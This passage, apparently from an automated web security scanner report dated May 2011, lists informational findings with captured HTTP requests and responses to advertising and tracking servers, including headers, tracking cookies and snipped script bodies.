Set-Cookie: ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=9996D17BE9434FAF86AAA6900B6D6F82&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=588064&Cr=71712&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: ATV164=15920d163AJLc68c268c1FJ7Nc38c1CFc2610cHU90cc26ODc8ccc26ODcccccccccccccc; expires=Wed, 11-May-2011 04:00:00 GMT; path=/
Set-Cookie: VCC164=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/
Set-Cookie: BTASES=SID=89BD0AAD619444D2AFEC01012356111B; path=/
Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:40 GMT
Connection: close
Content-Length: 4022

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...

24.8. http://ads.bridgetrack.com/ads_v2/script/btwrite.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bridgetrack.com
Path:   /ads_v2/script/btwrite.js

Request

GET /ads_v2/script/btwrite.js HTTP/1.1
Host: ads.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://ads.bridgetrack.com/a/f/?BT_CON=200&BT_PID=1559799&r=1748565961&click=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBjmhuQgrITdiEBbK9sQf_qZXkD4OtlZQCs5_thR3AjbcB0PalBBABGAEggqrzDjgAUJOPk9T6_____wFgyYaFiYikhBCgAb3klNsDsgETd3d3LnRoZXJlcHVibGljLmNvbboBCjMwMHgyNTBfYXPIAQnaASBodHRwOi8vd3d3LnRoZXJlcHVibGljLmNvbS9ob21lL7gCGMgC2_zMH6gDAdEDrGtosNr1JsXoA5ID6AO1KugD6QfoA7Mp6AO7KvUDAAAARA%26num%3D1%26sig%3DAGiWqtx_GS7Yu0kL0iNYahi3Cfl6RiqLbQ%26client%3Dca-pub-8560941387472259%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BTA144=; ASB164=TX=1304955461&D10=&D6=&D8=&D1=&D3=&Pb=104&A=8&SID=D59645850CE345599D5D3B6C8708440E&D4=&Vn=1423&Ct=0&Pc=0&D5=&S=&Cn=200&Pd=0&D9=&D2=&T=592007&Cr=70715&D7=&W=72461&Tr=72461&Cp=2248&P=1559799&B=164; ATV164=42111d163AJLc68c268c1FJ7Nc38c1CFc251RcI247cc26ODc8ccc26ODcccccccccccccc; BTASES=SID=BB336BA18EEA40CF862F97746AD6F63F; BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400,public
Content-Type: text/html
Expires: Tue, 10 May 2011 15:37:41 GMT
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:37:41 GMT
Connection: close
Content-Length: 49


function BTWrite( s )
{
document.write(s);
}

24.9. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:35|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB%26num%3D1%26sig%3DAGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.18015406071208417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=D9A20400-8E82-28EE-0209-AFE0003E0200; PRca=|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4400
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVlODIAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-9495-C8E0-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

24.10. http://amch.questionmarket.com/adscgen/sta.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Request

GET /adscgen/sta.php?survey_num=887938&site=2320695&code=4862365&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GP=XCLGFbrowser=Cg8JIk24ijttAAAASDs; CS1=725047-17-5_725047-7-2_725047-14-1_725047-12-1_40147218-21-1_41662936-12-1_851211-1-1_41115363-7-1_40774550-15-1_40379521-23-2_40774545-15-1_717103-2-1_500005059184-4-1_892555-6-2_41645540-6-1_41838359-2-1_891856-2-1_725047-4-1_725047-18-3_725047-9-1_865756-1-1; ES=859330-mt!$M-0_851211-g|0'M-0_840009-~d2'M-0_866249-hAB'M-^2_878089-aAB'M-N3_674921-dnE'M-0_884653-YBE'M-0_878529-m!E'M-C_908201-su''M-0_891575-V(''M-0_724925-fwM$M-JXi1_865756-Ihl$M-WaK1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:00 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b202.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 168
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d887938/3/500004862365/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


24.11. http://b3.mookie1.com/2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90

Request

GET /2/ZapTrader/ATT/Wired/Pros-Legacy/All/14a155dda-808a-4648-a03d-f65de2ef0ada@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; Dominos=247B3; RMFL=011QD4ETU107OI|U107OK; PizzaHut=ZapTrader; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT; id=914804995789526

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 244
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5345525d5f4f58455e445a4a423660;path=/;httponly

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="ATTWired=ZapTrader;expires="+B3d.toGMTString()+
...[SNIP]...

24.12. http://bidder.mathtag.com/iframe/notify

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Request

GET /iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82NTI4NTgzMTg4Nzg2NzYyOS8xMTU2MTEvMTA0MTEwLzQvUHN0dnZOejU5Z1Y0bjJBSVFYbVUxMUl4akNQZVFDbzRIOC1reTB1azB4TS8/0MK0a_nHZ9Q9pW69p8O0tDlvBqY&price=TcgJ7QAAFsoK5YLHnJZ9kSVCKfHI_sG5gfoHKA&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhugM7QnITcotx4WWB5H72eQJ3O-P8QHk9b28EfTCg5MSABABGAEgADgBUIDH4cQEYMmGhYmIpIQQggEXY2EtcHViLTY3NDM2MjI1MjUyMDI1NzKgAeDqmewDsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaASFodHRwOi8vd3d3LmNzbW9uaXRvci5jb20vQnVzaW5lc3OYAsAMwAIEyALWwYwO4AIA6gIPNzI4eDkwQl9HZW5lcmFsqAMB6ANr6AOTBegDmAPoA4sJ6AOMCfUDAgQARPUDIAAAAOAEAYAGhvXMtseQi5yOAQ%26num%3D1%26sig%3DAGiWqtyR42sLqfTMEi2_MQe-PLCHtbhRWQ%26client%3Dca-pub-6743622525202572%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304949603

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:16 GMT
Set-Cookie: mt_mop=4:1304955375; domain=.mathtag.com; path=/; expires=Thu, 08 May 2014 15:36:16 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Last-Modified: Mon, 09 May 2011 15:36:12 GMT
x-mm-dbg: won
x-mm-host: ewr-bidder-x6, ewr-bidder-x2
Server: MMBD/3.5.5
Content-Length: 1125
Content-Type: text/html
Connection: keep-alive

<IFRAME SRC="http://ad.doubleclick.net/adi/N5895.133090.0460774079521/B4563625.8;sz=728x90;ord=65285831887867629;click=http://pixel.mathtag.com/click/img?mt_aid=65285831887867629&mt_id=115611&mt_adid=
...[SNIP]...

24.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2363415&PluID=0&w=300&h=250&ord=60643838482108259&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=60643838482108259&mt_id=112711&mt_adid=100341&mt_uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://bidder.mathtag.com/iframe/notify?exch=adx&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy82MDY0MzgzODQ4MjEwODI1OS8xMTI3MTEvMTAxNzc4LzQvX2ZrTzhjMkc0aHVUREhNaTB2REd4bUZyWW93T240Z0pWR3dZWGlIQ3JTby8/wx5pTXc5IEg4EhGauv_ZowQal6A&price=TcgKYwADH_oK5XtBnK9ekEmaWNoad9RlH1xSlQ&dck=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBkRfnYwrITfq_DMH2lQeQvb3lCdzvj_EB-PbyvBGErMGhDwAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi02NzQzNjIyNTI1MjAyNTcyoAHg6pnsA7IBEXd3dy5jc21vbml0b3IuY29tugEKMzAweDI1MF9hc8gBCdoBSWh0dHA6Ly93d3cuY3Ntb25pdG9yLmNvbS9CdXNpbmVzcy8yMDExLzA1MDkvR2FzLXByaWNlcy1zdGFydC10by1oZWFkLWRvd26YAugHwAIEyALWwYwO4AIA6gIQMzAweDI1MENfR2VuZXJhbKgDAegD9AnoA5MF6AORA_UDAAQARPUDIAAAAOAEAYAGgIqNvobDucuOAQ%26num%3D1%26sig%3DAGiWqtzdUBy3-sRSj_5-4w3QHutXcJep2g%26client%3Dca-pub-6743622525202572%26adurl%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001juYhaL6r07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001iRpfaL7W0c9M00001juYhaL6q07Kl00001jAsGaJH602WG00003jBofaIOs07Si00001; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut910n0000000001uy98nW0000000001uy; expires=Sun, 07-Aug-2011 11:38:52 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 15:38:51 GMT
Connection: close
Content-Length: 2338

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

24.14. http://fls.doubleclick.net/activityi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.groupon.com/subscriptions/new?utm_source=mbe&utm_medium=cpc&utm_campaign=q4&utm_content=2s208&p={site}&a=Banner&s=1x1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 09 May 2011 15:35:38 GMT
Expires: Mon, 09 May 2011 15:35:38 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1835

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><!-- "Groupon" c/o "
...[SNIP]...

24.15. http://login.npr.org/openid/embed

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.npr.org
Path:   /openid/embed

Request

GET /openid/embed?token_url=http%3A%2F%2Fwww.npr.org%2Ftemplates%2Freg%2Flogin-janrain-submit.php HTTP/1.1
Host: login.npr.org
Proxy-Connection: keep-alive
Referer: http://www.npr.org/templates/reg/login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=67dd49e50cb64be8:T=1304954820:S=ALNI_MYV4BNcvZFn4_DZGKjOSNguebAEYg; __utmz=80228936.1304954834.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=; __utma=80228936.295210916.1304954814.1304954814.1304954814.1; __utmc=80228936; __utmb=80228936.1.10.1304954814; s_vi=[CS]v1|26E403E9851D2438-40000105C00E2764[CE]; anonId=262f4bfd-4160-43a2-834b-51fe4004bc4c; SiteLifeHost=l3vm108l3pluckcom; s_cc=true; s_sq=nprorg%3D%2526pid%253D136128917-Mississippi%252520River%252520Could%252520Crest%252520Monday%252520At%252520Memphis%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.npr.org/%25253Futm_source%25253Dtopnav%252526utm_medium%25253Dtopnav%252526utm_campaign%25253Dtopnav%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:39:49 GMT
Content-Type: text/html
Last-Modified: Thu, 05 May 2011 02:07:43 GMT
Connection: keep-alive
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 4792

<!DOCTYPE html>
<html dir="ltr" >
<head>
<title>Sign in - Powered by Janrain</title>
<meta charset="UTF-8" />

<script src="https://s3.amazonaws.com/static.rpxnow.com/js/lib/rpx.js" type
...[SNIP]...

24.16. http://odb.outbrain.com/utils/ping.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Request

GET /utils/ping.html?random=0.5672100060619414 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Mon, 09 May 2011 15:36:48 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

24.17. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
